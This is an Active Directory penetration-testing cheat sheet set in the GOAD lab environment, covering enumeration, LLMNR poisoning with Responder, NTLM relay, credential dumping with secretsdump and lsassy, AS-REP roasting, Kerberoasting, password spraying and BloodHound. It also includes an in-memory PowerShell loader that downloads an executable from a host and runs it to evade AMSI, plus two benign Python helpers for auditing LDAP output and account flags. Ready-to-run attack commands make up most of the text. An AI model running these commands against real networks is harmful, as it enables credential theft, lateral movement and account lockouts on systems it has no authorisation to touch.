Mindmap
- https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2022_11.svg
Useful Commands
- List domain controller SRV records (LDAP):
    nslookup -type=srv _ldap._tcp.dc._msdcs.sevenkingdoms.local 192.168.56.10
- Clock sync for Kerberos:
    sudo ntpdate [DC_IP]
- Password databases:
    https://www.weakpass.com/
    https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm
    https://github.com/berzerk0/Probable-Wordlists
Enumeration (Without Users or Credentials)
- Network scanning
  - via Nmap:
    nmap -Pn -p- -sC -sV -oA [Output_Filename] [IP_Range]
  - via SMB:
    crackmapexec smb 192.168.56.1/24
- Enumerate Domain Controllers
  - DNS SRV scan:
    nslookup -type=srv _ldap._tcp.dc._msdcs.sevenkingdoms.local 192.168.56.10
Enumeration (Using Poisoning or Relay)
- Poisoning
  - Responder:
    responder -I eth0
  - Crack hashes:
    hashcat -m 5600 --force -a 0 responder.hashes /usr/share/wordlists/rockyou.txt
- Relay
  - Search for hosts without SMB signing (relay targets):
    cme smb 192.168.56.10-23 --gen-relay-list relay.txt
  - NTLM relay with Responder:
    ntlmrelayx -tf smb_targets.txt -of netntlm -smb2support -socks
    sudo responder -I eth0
  - ntlmrelayx socks: with Administrator privileges, use the relayed sessions through proxychains (port 1080)
    - secretsdump (retrieves local SAM hashes, LSA cache and computer account(s); may require reinstalling impacket via python pip):
      proxychains secretsdump -no-pass 'NORTH'/'EDDARD.STARK'@'192.168.56.22'
    - lsassy:
      proxychains lsassy --no-pass -d NORTH -u EDDARD.STARK 192.168.56.22
    - DonPAPI:
      proxychains DonPAPI -no-pass 'NORTH'/'EDDARD.STARK'@'192.168.56.22'
    - smbclient:
      proxychains smbclient.py -no-pass 'NORTH'/'EDDARD.STARK'@'192.168.56.22' -debug
    - Code execution via smbexec (SMB) or atexec (Task Scheduler):
      proxychains smbexec.py -no-pass 'NORTH'/'EDDARD.STARK'@'192.168.56.22' -debug
- "Prefer IPv6 over IPv4" DNS poisoning + relay (Windows default)
  - mitm6 + WPAD to poison DNS, then ntlmrelayx to relay to the LDAP/SMB server
Enumeration (Without Users or Credentials) - With Anonymous Sessions
- Users:
    crackmapexec smb 192.168.56.11 --users
- Password policy:
    crackmapexec smb 192.168.56.11 --pass-pol
- Everything:
    enum4linux 192.168.56.11
- rpcclient direct enumeration (null session, then run the enumeration commands at the rpcclient prompt):
    rpcclient -U "NORTH\\" 192.168.56.11 -N
    rpcclient $> enumdomusers
    rpcclient $> enumdomgroups
- Samba direct enumeration:
    net rpc group members 'Domain Users' -W 'NORTH' -I '192.168.56.11' -U '%'
Enumeration (Without Users or Credentials) - Without Anonymous Sessions
- Bruteforce
  - Generate user list
    - Nmap Kerberos (krb5-enum-users):
      nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='sevenkingdoms.local',userdb=got_users.txt" 192.168.56.10
      Note: badPwdCount is not increased. Verify with:
      crackmapexec smb -u [user] -p [password] -d [domain] 192.168.56.11 --users
- Guest access on shares
  - CME:
    crackmapexec smb 192.168.56.10-23 -u 'a' -p '' --shares
Enumeration (With Users but no Credentials)
- AS-REP Roasting
  - Use the valid user list (from previous enumeration)
  - Obtain hashes from users with no pre-authentication required:
    GetNPUsers.py north.sevenkingdoms.local/ -no-pass -usersfile users.txt
    (accounts that are not affected are reported as: User rickon.stark doesn't have UF_DONT_REQUIRE_PREAUTH set)
  - Crack the hash via hashcat:
    hashcat -m 18200 asrephash /usr/share/wordlists/rockyou.txt
- Password Spray (careful about locking accounts)
  - User=Password test:
    crackmapexec smb 192.168.56.11 -u users.txt -p users.txt --no-bruteforce
  - Sprayhound:
    sprayhound -U users.txt -d north.sevenkingdoms.local -dc 192.168.56.11 --lower
    sprayhound -U users.txt -d north.sevenkingdoms.local -dc 192.168.56.11 -lu hodor -lp hodor --lower -t 2 (reduce the number of tries)
  - View badPwdCount:
    cme smb -u samwell.tarly -p Heartsbane -d north.sevenkingdoms.local 192.168.56.11 --users
Enumeration (With User and Credentials)
- Full list of users:
    GetADUsers.py -all [domain]/[user]:[password]
  - Continue password spraying using the new usernames
- Perform LDAP queries: https://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap
  - Graphical interface: Apache Directory Studio
  - Initial query:
    ldapsearch -H ldap://[IP] -D "[user]@[domain]" -w [password] -b [Base_DN] [filter]
  - Distinguished Name as search base, filtering on user objects:
    ldapsearch -H ldap://[IP] -D "[user]@[domain]" -w [password] -b 'DC=north,DC=sevenkingdoms,DC=local' "(&(objectCategory=person)(objectClass=user))" | grep 'distinguishedName:'
  - Retrieve multiple attributes:
    ... | grep -i -e 'distinguishedName:' -e 'badPwdCount:'
  - Query other trusted domains (two separate searches):
    ... -b 'DC=essos,DC=local' "(&(objectCategory=person)(objectClass=user))"
    ... -b 'DC=sevenkingdoms,DC=local' "(&(objectCategory=person)(objectClass=user))"
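The grep pipeline above prints distinguishedName and badPwdCount as unrelated lines. The following Python is an added example (not part of the original cheat sheet) that parses ldapsearch's LDIF output properly: it keeps the two attributes paired per entry, handles LDIF line folding (a continuation line starts with one space) and base64 values (`attr:: ...`), and lists the accounts whose badPwdCount sits within one attempt of the domain lockout threshold. The LDIF text, the account names and the threshold value are constructed sample data in the shape ldapsearch prints for the filter used above.

```python
"""Pair distinguishedName with badPwdCount from ldapsearch (LDIF) output.

Added example, not part of the original cheat sheet. SAMPLE_LDIF is a
constructed sample; real input is the stdout of the ldapsearch command above.
"""
import base64
import re

SAMPLE_LDIF = """\
# extended LDIF
# base <DC=north,DC=sevenkingdoms,DC=local> with scope subtree
# filter: (&(objectCategory=person)(objectClass=user))

# jon.snow, Users, north.sevenkingdoms.local
dn: CN=jon.snow,CN=Users,DC=north,DC=sevenkingdoms,DC=local
distinguishedName: CN=jon.snow,CN=Users,DC=north,DC=sevenkingdoms,DC=local
sAMAccountName: jon.snow
description:: SGVsbG8=
badPwdCount: 0
userAccountControl: 512

# samwell.tarly, Users, north.sevenkingdoms.local
dn: CN=samwell.tarly,CN=Users,DC=north,DC=sevenkingdoms,DC=local
distinguishedName: CN=samwell.tarly,CN=Users,DC=north,DC=sevenkingdoms,DC
 =local
sAMAccountName: samwell.tarly
badPwdCount: 4
userAccountControl: 66048

# search result
search: 2
result: 0 Success

# numResponses: 3
# numEntries: 2
"""

# "attr: value" or "attr:: base64value"
ATTR_LINE = re.compile(r"^([A-Za-z][\w;.-]*)(::?) ?(.*)$")


def unfold_ldif(text):
    """Join folded lines: in LDIF a line starting with one space continues the previous line."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines


def parse_ldif(text):
    """Return one dict per entry (attribute name lowercased -> list of values)."""
    entries, current = [], {}
    for line in unfold_ldif(text):
        if not line.strip():            # a blank line ends the current entry
            if current:
                entries.append(current)
                current = {}
            continue
        if line.startswith("#"):        # ldapsearch comment lines
            continue
        m = ATTR_LINE.match(line)
        if not m:
            continue
        attr, sep, value = m.group(1).lower(), m.group(2), m.group(3)
        if sep == "::":                 # base64-encoded value
            value = base64.b64decode(value).decode("utf-8", "replace")
        current.setdefault(attr, []).append(value)
    if current:
        entries.append(current)
    # the trailing "search:/result:" block has no dn and is not a directory entry
    return [e for e in entries if "dn" in e]


def bad_pwd_counts(text):
    """Map each entry's distinguishedName to its badPwdCount (0 when the attribute is absent)."""
    out = {}
    for e in parse_ldif(text):
        dn = e.get("distinguishedname", e["dn"])[0]
        out[dn] = int(e.get("badpwdcount", ["0"])[0])
    return out


def near_lockout(text, lockout_threshold, margin=1):
    """DNs whose badPwdCount is within `margin` attempts of the lockout threshold.

    A tester checks this before spraying; a defender uses it to spot a spray in progress.
    """
    limit = lockout_threshold - margin
    return sorted(dn for dn, c in bad_pwd_counts(text).items() if c >= limit)


if __name__ == "__main__":
    for dn, count in bad_pwd_counts(SAMPLE_LDIF).items():
        print(f"{count:>3}  {dn}")
    print("near lockout:", near_lockout(SAMPLE_LDIF, lockout_threshold=5))
```

Feed it real output with `ldapsearch ... | python3 this_script.py` after replacing SAMPLE_LDIF with `sys.stdin.read()`; the lockout threshold comes from the password policy query (`--pass-pol`) earlier on this page.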
- Kerberoasting (attack services with a ServicePrincipalName set and no preauth checks)
  - Retrieve hashes via impacket:
    GetUserSPNs.py -request -dc-ip 192.168.56.11 north.sevenkingdoms.local/brandon.stark:iseedeadpeople -outputfile kerberoasting.hashes
  - Retrieve hashes via CME:
    cme ldap 192.168.56.11 -u brandon.stark -p 'iseedeadpeople' -d north.sevenkingdoms.local --kerberoasting KERBEROASTING
  - Crack hashes via hashcat:
    hashcat -m 13100 --force -a 0 kerberoasting.hashes /usr/share/wordlists/rockyou.txt
- Enumerating shares (authenticated)
    cme smb 192.168.56.10-23 -u jon.snow -p iknownothing -d north.sevenkingdoms.local --shares
    smbclient -L \\192.168.56.10 -U jon.snow -W north.sevenkingdoms.local (single host)
- Enumerating DNS: retrieve all DNS records of the domain or forest
  - https://github.com/dirkjanm/adidnsdump (pip install)
    adidnsdump -u 'north.sevenkingdoms.local\jon.snow' -p 'iknownothing' winterfell.north.sevenkingdoms.local -> records.csv
- BloodHound path enumeration
  - Python ingestor: https://github.com/fox-it/BloodHound.py.git (incomplete)
    bloodhound.py --zip -c All -d north.sevenkingdoms.local -u brandon.stark -p iseedeadpeople -dc winterfell.north.sevenkingdoms.local
    ~/.local/bin/bloodhound-python --zip -c All -d [domain] -u [user] -p [password] -ns [nameserver_IP]
  - .NET ingestor: https://github.com/BloodHoundAD/SharpHound
    - RDP connection to the service:
      xfreerdp /u:jon.snow /p:iknownothing /d:north /v:192.168.56.22 /cert-ignore
    - In-memory SharpHound (bypass AMSI):
      $data = (New-Object System.Net.WebClient).DownloadData('http://192.168.56.1/SharpHound.exe')
      $assem = [System.Reflection.Assembly]::Load($data)
      [Sharphound.Program]::Main("-d north.sevenkingdoms.local -c all".Split())
- BloodHound hunting
  - Install:
    sudo apt-get install bloodhound; sudo neo4j start; bloodhound
  - Default password: neo4j:neo4j
  - neo4j (Cypher) queries:
    - Domains + computers:
      MATCH p = (d:Domain)-[r:Contains*1..]->(n:Computer) RETURN p
    - Users:
      MATCH p = (d:Domain)-[r:Contains*1..]->(n:User) RETURN p
    - Groups:
      MATCH q=(d:Domain)-[r:Contains*1..]->(n:Group)<-[s:MemberOf]-(u:User) RETURN q
    - ACL:
      MATCH p=(u:User)-[r1]->(n) WHERE r1.isacl=true and not tolower(u.name) contains 'vagrant' RETURN p
  - Other resources: https://en.hackndo.com/bloodhound/, https://hausec.com/2019/09/09/bloodhound-cypher-cheatsheet/, https://github.com/hausec/Bloodhound-Custom-Queries
Kerberos Setup (On Linux)
- Update /etc/hosts:
    192.168.56.10 sevenkingdoms.local kingslanding.sevenkingdoms.local kingslanding
    192.168.56.11 winterfell.north.sevenkingdoms.local north.sevenkingdoms.local winterfell
    192.168.56.12 essos.local meereen.essos.local meereen
    192.168.56.22 castelblack.north.sevenkingdoms.local castelblack
    192.168.56.23 braavos.essos.local braavos
- Install Kerberos client:
    sudo apt install krb5-user
- Set up the /etc/krb5.conf configuration file: https://mayfly277.github.io/posts/GOADv2-pwning_part1/
- Reconfigure:
    sudo dpkg-reconfigure krb5-config
Kerberos Tickets
- Retrieve:
    getTGT.py essos.local/khal.drogo:horse
- Export:
    export KRB5CCNAME=/workspace/[DC_User].ccache
- Use:
    smbclient.py -k @[Machine_IP_Domain]
Domains, Forests, and Trusts
Users
- Leveraging user secrets: LM/NT hashes and Kerberos tickets
    secretsdump.py 'contoso.local/Administrator@192.168.100.2' -just-dc-user anakin
    Use AES256-CTS-HMAC-SHA1-96 to avoid alarms.
- Determine the UserAccountControl attribute:
    Get-ADUser -Identity "username" -Properties UserAccountControl
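Get-ADUser returns UserAccountControl as a bare integer, and the GetNPUsers.py output earlier on this page refers to one of its bits by name (UF_DONT_REQUIRE_PREAUTH). The Python below is an added example, not part of the original cheat sheet: it decodes the integer into the UF_* flag names (bit values as documented by Microsoft for userAccountControl) and audits a list of (sAMAccountName, userAccountControl) pairs for the conditions this page's sections depend on, such as DONT_REQ_PREAUTH (AS-REP roastable), PASSWD_NOTREQD and unconstrained delegation. The account list, its names and its values are constructed sample data.

```python
"""Decode userAccountControl and audit the flags that matter on this page.

Added example, not part of the original cheat sheet. The bit values are the
documented userAccountControl flags; SAMPLE_ACCOUNTS is constructed data.
"""

UAC_FLAGS = {
    0x0001: "SCRIPT",
    0x0002: "ACCOUNTDISABLE",
    0x0008: "HOMEDIR_REQUIRED",
    0x0010: "LOCKOUT",
    0x0020: "PASSWD_NOTREQD",
    0x0040: "PASSWD_CANT_CHANGE",
    0x0080: "ENCRYPTED_TEXT_PWD_ALLOWED",
    0x0100: "TEMP_DUPLICATE_ACCOUNT",
    0x0200: "NORMAL_ACCOUNT",
    0x0800: "INTERDOMAIN_TRUST_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x20000: "MNS_LOGON_ACCOUNT",
    0x40000: "SMARTCARD_REQUIRED",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x100000: "NOT_DELEGATED",
    0x200000: "USE_DES_KEY_ONLY",
    0x400000: "DONT_REQ_PREAUTH",
    0x800000: "PASSWORD_EXPIRED",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
    0x4000000: "PARTIAL_SECRETS_ACCOUNT",
}
UAC_MASK = sum(UAC_FLAGS)                       # all known bits
UAC_BY_NAME = {name: bit for bit, name in UAC_FLAGS.items()}


def decode_uac(value):
    """Return the flag names set in a userAccountControl integer, lowest bit first."""
    names = [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]
    unknown = value & ~UAC_MASK                 # bits outside the documented set
    if unknown:
        names.append(f"UNKNOWN_0x{unknown:X}")
    return names


def has_flag(value, flag_name):
    """True when the named flag is set (KeyError for an unknown flag name)."""
    return bool(value & UAC_BY_NAME[flag_name])


# Constructed sample: (sAMAccountName, userAccountControl)
SAMPLE_ACCOUNTS = [
    ("jon.snow", 512),           # NORMAL_ACCOUNT
    ("samwell.tarly", 66048),    # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD
    ("brandon.stark", 4194816),  # NORMAL_ACCOUNT | DONT_REQ_PREAUTH
    ("hodor", 66080),            # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD | PASSWD_NOTREQD
    ("krbtgt", 514),             # NORMAL_ACCOUNT | ACCOUNTDISABLE
    ("winterfell$", 532480),     # SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION
]

# finding name -> flag that triggers it
AUDIT_RULES = {
    "asrep_roastable": "DONT_REQ_PREAUTH",
    "password_not_required": "PASSWD_NOTREQD",
    "unconstrained_delegation": "TRUSTED_FOR_DELEGATION",
    "password_never_expires": "DONT_EXPIRE_PASSWORD",
    "disabled": "ACCOUNTDISABLE",
}


def audit_accounts(accounts, rules=AUDIT_RULES):
    """Group account names under each finding whose flag is set; names sorted per finding."""
    findings = {finding: [] for finding in rules}
    for sam, uac in accounts:
        for finding, flag in rules.items():
            if has_flag(uac, flag):
                findings[finding].append(sam)
    return {finding: sorted(names) for finding, names in findings.items()}


if __name__ == "__main__":
    for sam, uac in SAMPLE_ACCOUNTS:
        print(f"{sam:<16} {uac:>9}  {' | '.join(decode_uac(uac))}")
    for finding, names in audit_accounts(SAMPLE_ACCOUNTS).items():
        print(f"{finding}: {names}")
```

The same decoder applies to the userAccountControl values that the ldapsearch queries earlier on this page return, so an LDAP-side audit for pre-authentication being disabled needs no PowerShell at all; the fix for an AS-REP roastable account is clearing that bit on the account.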
